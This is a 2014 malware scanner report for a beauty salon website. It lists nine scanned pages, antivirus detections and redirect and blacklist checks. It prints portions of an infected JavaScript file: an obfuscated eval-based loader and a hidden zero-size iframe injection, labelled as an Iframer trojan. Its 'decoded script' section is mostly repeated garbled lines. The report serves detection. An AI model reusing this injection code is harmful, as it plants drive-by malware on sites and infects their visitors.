New scan:

Malware Scanner report for atbeautyart.com

Malicious/Suspicious/Total urls checked
1/0/9
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://atbeautyart.com/
200 OK
Content-Length: 7975
Content-Type: text/html
clean
http://atbeautyart.com/Scripts/AC_RunActiveContent.js
200 OK
Content-Length: 15470
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false;
var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false;
var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false;
function ControlVersion()
{
var version;
var axo;
var e;

try {
axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");
version = axo.GetVariable("$version");
} catch (e) {
}
if (!version)
... 3296 bytes are skipped ...
06,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));}
if(f)e(s);}

Decoded script:


j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
... 32997 bytes are skipped ...
ifrm.style.width = "0px";
ifrm.style.height = "0px";
ifrm.style.visibility = "hidden";
document.body.appendChild(ifrm);
}
} catch (e) {
}
}, 500 */
var hi = this.seed / this.Q;
var lo = this.seed % this.Q;
var test = this.A * lo - this.R * hi;
if(test > 0){
this.seed = test;
} else {
this.seed = test + this.M;
}
return (this.see

Antivirus reports:

nProtect
JS:Trojan.Iframer.C
K7AntiVirus
Trojan
Emsisoft
JS:Trojan.Iframer.C (B)
Kaspersky
HEUR:Trojan.Script.Iframer
Microsoft
Trojan:JS/Iframeinject.AB
MicroWorld-eScan
JS:Trojan.Iframer.C
F-Secure
JS:Trojan.Iframer.C
F-Prot
JS/IFrame.QW
GData
JS:Trojan.Iframer.C
Commtouch
JS/IFrame.QW
BitDefender
JS:Trojan.Iframer.C

http://atbeautyart.com/service-facialgold.html
200 OK
Content-Length: 9508
Content-Type: text/html
clean
http://atbeautyart.com/service-basicfacial.html
200 OK
Content-Length: 7018
Content-Type: text/html
clean
http://atbeautyart.com/service-paraffinfacial.html
200 OK
Content-Length: 7790
Content-Type: text/html
clean
http://atbeautyart.com/service-permanent.html
200 OK
Content-Length: 7878
Content-Type: text/html
clean
http://atbeautyart.com/service-salonhair.html
200 OK
Content-Length: 10416
Content-Type: text/html
clean
http://atbeautyart.com/service-additional.html
200 OK
Content-Length: 8646
Content-Type: text/html
clean
http://atbeautyart.com/test404page.js
404 Not Found
Content-Length: 277
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: atbeautyart.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 15 Aug 2014 09:52:55 GMT
Accept-Ranges: bytes
ETag: "4e967b81-1f27"
Server: nginx
Content-Length: 7975
Content-Type: text/html
Last-Modified: Thu, 13 Oct 2011 05:47:45 GMT
X-Powered-By: PleskLin

...7975 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: atbeautyart.com
Referer: http://www.google.com/search?q=atbeautyart.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=atbeautyart.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://atbeautyart.com/

Result: atbeautyart.com is not infected or malware details are not published yet.